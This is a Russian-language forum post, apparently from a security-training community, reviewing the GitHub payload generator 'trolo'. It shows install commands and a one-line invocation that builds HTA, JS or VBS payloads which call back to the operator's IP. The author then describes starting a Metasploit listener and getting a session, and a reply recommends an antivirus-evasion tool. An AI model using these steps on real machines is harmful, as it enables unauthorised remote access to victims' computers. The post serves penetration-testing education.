• Курсы Академии Кодебай, стартующие в мае - июне, от команды The Codeby

    1. Цифровая криминалистика и реагирование на инциденты
    2. ОС Linux (DFIR) Старт: 16 мая
    3. Анализ фишинговых атак Старт: 16 мая Устройства для тестирования на проникновение Старт: 16 мая

    Скидки до 10%

    Полный список ближайших курсов ...

Статья Trolo - генератор полезной нагрузки

Добрый день всем!
Читал очень много статей, решил и сам попробовать написать обзор на один инструмент который нашел на гитхабе. Первый раз пишу поэтому прошу прощения если что то укажу не до конца.
Итак речь пойдет о trolo, скрипте для создания полезной нагрузки. Форматов нагрузки в нем не так много но все же думаю может кому и пригодится сие чудо.
Начнем с установки
Код:
git clone https://github.com/b3rito/trolo копируем
chmod +x trolo.sh даем права на запуск
./trolo.sh запуск скрипта
и если все чудесно то получаем это
Screenshot_3.png


идем далее, как видно нам предлагается заполнить данные для генерации нагрузки
  1. IP: 192.167.1.5 (пишем свой IP)
  2. порт (по умолчанию 443) я его оставил так же
  3. Имя файла полезной нагрузки (codeby)
  4. архитектура (х86/х64) в роли жертвы мой комп с архитектурой х86
  5. формат нагрузки (как видим список довольно небольшой (hta, js, vbs, custom) я выбрал в качестве теста нагрузку в hta
также можно сгенерировать нагрузку данной командой
Код:
./trolo.sh -i [IP] -p [PORT] -n [NAME] -f [FORMAT] -a [ARCH. x86/x64]

p.s. также у нас сохраняется не только нагрузка выбранного формата, но и код нагрузки в текстовом формате txt
Screenshot_4.png


далее нам предлагается запустить метасплоит для прослушки, разумеется пишем yes
Screenshot_5.png


ну и собственно после доставки полезной нагрузки получаем сессию
Без имени-1.jpg

Спасибо всем за внимание и доброй охоты;)
 
Последнее редактирование:
O

OneDollar

Ну нормас, пойдет) я статью писал про Phantom-Evasion, прочти, тебе понравится, там вообще не будет ав ругаться
 
  • Нравится
Реакции: Contror

Contror

Green Team
17.06.2017
97
44
BIT
3
Ну нормас, пойдет) я статью писал про Phantom-Evasion, прочти, тебе понравится, там вообще не будет ав ругаться
как раз только утром прочитал))) спасибо!

а кстати вопрос немного и по теме и нет, никто не в курсе почему файлы формата HTA иногда запускаются без вопроса о запуске а иногда с ним, как то довольно странно с учетом того что тестирую на одном и том же компе с одними и теми же настройками:confused:
 
Последнее редактирование:
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!